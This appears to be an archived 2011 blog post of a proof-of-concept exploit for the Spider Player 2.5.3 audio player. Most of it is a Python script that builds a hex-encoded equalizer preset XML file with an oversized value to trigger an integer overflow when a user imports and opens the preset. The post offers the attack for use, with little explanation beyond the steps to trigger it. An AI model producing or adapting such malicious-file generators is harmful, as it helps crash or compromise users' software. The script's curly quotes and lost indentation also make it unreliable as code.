Archive | March 2011

Spider Player 2.5.3 Integer Overflow PoC

# Spider Player 2.5.3 Integer Overflow PoC
#
# Desc:Spider Player supports nearly thirty audio formats including
#      most popular ones. You can use it to play music from your audio
#      collection, stream files from the Internet and listen to Internet
#      radio.
#
# Use: Open the Equalizer, import the .xml file, double-click on
#     the preset
#
# Vulnerabiliry found by Dame Jovanoski (badc0re)
#
#
#
from struct import *
f=open(“exploit.xml”,”w”)
head=(“\x3c\x3f\x78\x6d\x6c\x20\x76\x65\x72\x73\x69\x6f\x6e\x3d”
“\x22\x31\x2e\x30\x22\x3f\x3e\x0d\x0a\x3c\x45\x51\x50\x72”
“\x65\x73\x65\x74\x73\x3e\x0d\x0a\x20\x20\x3c\x50\x72\x65”
“\x73\x65\x74\x20\x4e\x61\x6d\x65\x3d\x22\x45\x78\x70\x6c”
“\x6f\x69\x74\x22\x20\x42\x31\x3d”)
int_over=”\x2211111111111111111111\x22″

end=(“\x20\x42\x32\x3d\x22\x30\x22\x20\x42\x33\x3d\x22\x30\x22”
“\x20\x42\x34\x3d\x22\x33\x22\x20\x42\x35\x3d\x22\x33\x22”
“\x20\x42\x36\x3d\x22\x33\x22\x20\x42\x37\x3d\x22\x30\x22”
“\x20\x42\x38\x3d\x22\x32\x22\x20\x42\x39\x3d\x22\x34\x22”
“\x20\x42\x31\x30\x3d\x22\x34\x22\x2f\x3e\x0d\x0a\x3c\x2f”
“\x45\x51\x50\x72\x65\x73\x65\x74\x73\x3e\x0d\x0a”)
try:
f.write(head+int_over+end)
f.close()
print “File created”
except:
print “File cannot be created”